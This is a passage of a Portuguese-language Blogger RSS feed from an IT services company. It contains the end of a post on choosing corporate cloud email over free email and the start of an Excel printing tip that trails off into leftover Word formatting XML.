Como exemplo de serviços de e-mails empresariais na nuvem temos: o Exchange Online dentro do Office 365 da Microsoft, o Gmail dentro do Gsuite da Google, entre alguns outros competidores menores.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Esses serviços de e-mails corporativos são uma evolução dos serviços de e-mail oferecidos pelos antigos provedores de hospedagem ou de e-mail “hosteado”.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Neste modelo, fabricantes como Microsoft ou Google, oferecem um serviço de e-mail com recursos infinitos em um ambiente elástico e altamente seguro, onde, de fato, você só paga pelo o que consumir.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O fornecedor de e-mail na nuvem cobra somente pelos usuários que estão consumindo recursos e ele passa a ficar responsável por toda a plataforma de e-mail, sendo você somente responsável pela configuração e criação dos usuários e regras de negócio.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Abaixo destaco os diferenciais deste modelo de contratação de e-mail corporativo:&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Alta disponibilidade – Serviços como o Office 365 da Microsoft oferecem uma garantia de disponibilidade na casa dos 99,9%, o que garante que seu e-mail estará sempre disponível sem paradas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Acesso de qualquer lugar– Você acessará o seu e-mail de praticamente qualquer dispositivo de qualquer parte do mundo, sempre através de uma conexão segura e criptografada.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Recursos avançados de colaboração – Esses provedores de nuvem costumam oferecer muito mais que somente serviço de e-mail, oferecendo junto uma série de ferramentas de colaboração e produtividade que tornam seu time de trabalho muito mais produtivo.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Integração com a sua rede corporativa – Com esses serviços de e-mail na nuvem, é possível integrar seu ambiente de e-mail com a sua rede corporativa.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Outra grande vantagem deste modelo de contratação de serviços de e-mail empresarial, é poder ter os mesmos recursos que antes estavam disponíveis somente para grandes corporações pagando um valor baixo por usuário.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;9º por que uma empresa não deve usar e-mail gratuito?&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Me desculpe a sinceridade, mas se a sua empresa ainda não possui um dominio.com.br para chamar de seu, ela está fadada ao fracasso.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
O mundo se tornou digital. As pessoas só compram ou são influenciadas a comprar pelo conteúdo que leem na internet. Ter um site é o básico para os seus clientes acharem a sua empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
E se você já tem um site público, não importa se .com, .org ou qualquer outro sufixo, não faz sentido você continuar usando um e-mail @gmail.com correto?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Eu adoro listas porque elas simplificam o entendimento. Então aqui vai mais uma lista de motivos de por que não usar um e-mail gratuito na sua empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;div -=&quot;&quot; a=&quot;&quot; barato=&quot;&quot; chamar=&quot;&quot; cliente=&quot;&quot; com=&quot;&quot; credibilidade=&quot;&quot; de=&quot;&quot; div=&quot;&quot; e-mail=&quot;&quot; empresarial=&quot;&quot; envia=&quot;&quot; fornecedor=&quot;&quot; gmail.com=&quot;&quot; identidade=&quot;&quot; muito=&quot;&quot; nenhuma=&quot;&quot; ou=&quot;&quot; para=&quot;&quot; passa=&quot;&quot; qual=&quot;&quot; quando=&quot;&quot; que=&quot;&quot; s=&quot;&quot; sem=&quot;&quot; seu.=&quot;&quot; style=&quot;text-align: justify;&quot; ter=&quot;&quot; um=&quot;&quot; voc=&quot;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXappZA-jiWmU0gkxXzL4wxhCEJ6Xb2ijHxVw4aY7REgNhTvs7sv_kyJ57WoXqrAdDSqegCiDREzyYExQuVhyphenhyphenC6M_zqxKXrkTywyChxNFEmG-jyxcf_zFyRhj0dt9ATEHIzKbPg3PJ8wE/s1600/baneer.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;340&quot; data-original-width=&quot;1600&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXappZA-jiWmU0gkxXzL4wxhCEJ6Xb2ijHxVw4aY7REgNhTvs7sv_kyJ57WoXqrAdDSqegCiDREzyYExQuVhyphenhyphenC6M_zqxKXrkTywyChxNFEmG-jyxcf_zFyRhj0dt9ATEHIzKbPg3PJ8wE/s320/baneer.jpeg&quot; width=&quot;500&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Sem identidade – Qual a credibilidade que você passa quando envia um e-mail para um cliente ou um fornecedor com @gmail.com? Nenhuma! É muito barato ter um e-mail empresarial para chamar só de seu.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Sem gerência – Um e-mail gratuito não permite gerenciamento dos usuários. Se sua empresa tem mais de três usuários já é um convite para o caos. Imagine se um funcionário resolver pedir demissão sem avisar? Ele leva todos os e-mails com ele. Se bobear até os clientes.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Você está sendo espionado – Já reparou que esses serviços de e-mail gratuitos acertam bastante nos anúncios que oferecem no topo ou na lateral do Webmail? Sabe por quê? Porque eles estão te espionando! Lendo as suas mensagens em cada e-mail! Sabendo disso você vai continuar deixando eles lerem as mensagens da sua empresa?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Sem garantias – Sim, é difícil esses e-mails ficarem fora do ar., mas se derem problemas, você não tem para quem reclamar! A sua empresa pode ficar à mercê disso?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Talvez a sua empresa esteja começando. Talvez esteja passando por uma crise e tenha pouco dinheiro. Mas uma coisa eu tenho certeza, é melhor usar um e-mail de provedor de hospedagem antigo e com poucos recursos do que usar um e-mail gratuito.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Assim, quando sua empresa crescer ou se recuperar, você poderá migrar para uma solução de e-mail empresarial.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;10º como criar um e-mail corporativo&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Depois de explicado os tipos de serviços/servidores de e-mail que existem e de ter entendido que uma empresa não deve usar um serviço de e-mail gratuito, é chegada a hora de tomar a decisão e escolher o seu próximo serviço de e-mail empresarial.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Antes de implantar um e-mail para sua empresa, você deve avaliar os seguintes pontos:&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Já utiliza algum serviço de e-mail empresarial com o seu domínio?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Vai criar o serviço de e-mail do zero ou vai migrar os dados do serviço de e-mails antigo?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Quantos usuários (e não quantas caixas de e-mail) vai usar no novo serviço de e-mail?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Qual o tamanho médio atual das caixas postais (em GB)?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Qual o tamanho da maior caixa postal (em GB)?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Qual a capacidade de upload do seu link?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Qual o tamanho da sua equipe de TI?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Possui gente capacitada para operar o novo serviço de e-mail?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Não faz mais sentido terceirizar?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Qual o custo por mailbox do serviço de e-mail que pretende contratar?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Precisa de algum outro serviço além de e-mail, como suíte de produtividade (ex.: Office), chat corporativo e outras ferramentas periféricas?&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmC8IjU6qyePo9N83xM9OSoaYcFQy2oTkNf3GW_UOJGIqM1CJTPFssYa0DkEvqGwA7qe33K7IfYC1XOhA6eEUlRRfsi3_U5dEhz-7_PkPUXz1XDB9AHtELLtCOQxEDeoMMMxnZjGPpReU/s1600/anuncie2.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;60&quot; data-original-width=&quot;468&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmC8IjU6qyePo9N83xM9OSoaYcFQy2oTkNf3GW_UOJGIqM1CJTPFssYa0DkEvqGwA7qe33K7IfYC1XOhA6eEUlRRfsi3_U5dEhz-7_PkPUXz1XDB9AHtELLtCOQxEDeoMMMxnZjGPpReU/s1600/anuncie2.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 17px;&quot;&gt;Características essenciais&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Oferecer a possibilidade de usar o domínio público da sua empresa;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- O Webmail deve usar uma conexão SSL para comunicação entre o seu computador e o servidor;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Permitir o sincronismo das mensagens entre vários dispositivos com atualizações simultâneas;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Ter o armazenamento das mensagens, agendas e contatos todos na nuvem;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Ter um bom espaço para armazenamento de mensagens para cada um dos usuários;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Ter um SLA (Garantia de disponibilidade) definido em contrato com punições financeiras caso não cumpra;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Ter um canal prático e rápido para suporte técnico;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
- Ter ferramentas de controle e prevenção de de malware e spam e que sejam efetivas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
É importante fazer uma análise de TCO (Custo total de propriedade) da solução e-mail que está pensando contratar, levando sempre em consideração a rotatividade da equipe, considerando o médio ou longo prazo.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Depois de ter pensado em todas as questões, é hora de escolher o seu próximo fornecedor de e-mail corporativo.&lt;/div&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2018/08/e-mail-corporativo-tudo-o-que-voce.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJIc-66BO4FYMKAIUH9n2UGAgIASiWuGVx3AweUzr2GgIU5Ri2bdC5T_ACwtKiLpm7GT2hELRe_LpS5FvAW3JtUSHkzPd0q6BUek0hJE1mx7vhzoYC_t9Xos-8QNrdRd0LpdTB6NGTGMo/s72-c/baneer.jpeg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-6872742944346668056</guid><pubDate>Tue, 31 Jul 2018 18:14:00 +0000</pubDate><atom:updated>2018-07-31T15:56:58.264-03:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Imprimir várias páginas do Excel em uma folha de papel&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Você pode imprimir várias páginas da sua planilha do Excel em uma única folha de papel. Você pode fazer isso seguindo as seguintes etapas:&lt;br /&gt;
&lt;br /&gt;
1º. Exiba a guia Layout da página da faixa de opções.&lt;br /&gt;
&lt;br /&gt;
2º. Clique no ícone pequeno no canto inferior direito do grupo Configurar página. Excel exibe a caixa de diálogo Configurar página.&lt;br /&gt;
&lt;br /&gt;
3º. Clique no botão Opções. O Excel exibe a caixa de diálogo Propriedades da impressora.&lt;br /&gt;
&lt;br /&gt;
4º. Procure pelas guias disponíveis para localizar uma que tenha um controle de páginas por folha ou um controle de várias páginas. Na minha impressora, é a guia Recursos; no seu, pode ser diferente. (Veja a Figura 1.)&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ZIoeJQ2hbc42XnY0Qcw2uQ8JIjy7uD6ZlMeR8SrX4Jn_6tr4SCQZSoUWvhbaQ4UH8wqBzoZA2bcbZlZQDJpSJi9MNPOxk9KteuLZ2gSXfl7_Bf6CW9RKB3huLW0ktJjBEROv2D-cGn4/s1600/T6214F1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;583&quot; data-original-width=&quot;628&quot; height=&quot;370&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ZIoeJQ2hbc42XnY0Qcw2uQ8JIjy7uD6ZlMeR8SrX4Jn_6tr4SCQZSoUWvhbaQ4UH8wqBzoZA2bcbZlZQDJpSJi9MNPOxk9KteuLZ2gSXfl7_Bf6CW9RKB3huLW0ktJjBEROv2D-cGn4/s400/T6214F1.jpg&quot; width=&quot;400&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
(Figura 1)&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:AllowPNG/&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:HyphenationZone&gt;21&lt;/w:HyphenationZone&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;PT-BR&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:EnableOpenTypeKerning/&gt;
   &lt;w:DontFlipMirrorIndents/&gt;
   &lt;w:OverrideTableStyleHps/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val=&quot;Cambria Math&quot;/&gt;
   &lt;m:brkBin m:val=&quot;before&quot;/&gt;
   &lt;m:brkBinSub m:val=&quot;--&quot;/&gt;
   &lt;m:smallFrac m:val=&quot;off&quot;/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val=&quot;0&quot;/&gt;
   &lt;m:rMargin m:val=&quot;0&quot;/&gt;
   &lt;m:defJc m:val=&quot;centerGroup&quot;/&gt;
   &lt;m:wrapIndent m:val=&quot;1440&quot;/&gt;
   &lt;m:intLim m:val=&quot;subSup&quot;/&gt;
   &lt;m:naryLim m:val=&quot;undOvr&quot;/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState=&quot;false&quot; DefUnhideWhenUsed=&quot;false&quot;
  DefSemiHidden=&quot;false&quot; DefQFormat=&quot;false&quot; DefPriority=&quot;99&quot;
  LatentStyleCount=&quot;371&quot;&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;0&quot; QFormat=&quot;true&quot; Name=&quot;Normal&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;heading 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;toc 9&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Normal Indent&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;footnote text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;annotation text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;header&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;footer&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;index heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;35&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;caption&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;table of figures&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;envelope address&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;envelope return&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;footnote reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;annotation reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;line number&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;page number&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;endnote reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;endnote text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;table of authorities&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;macro&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;toa heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Bullet 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;List Number 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;10&quot; QFormat=&quot;true&quot; Name=&quot;Title&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
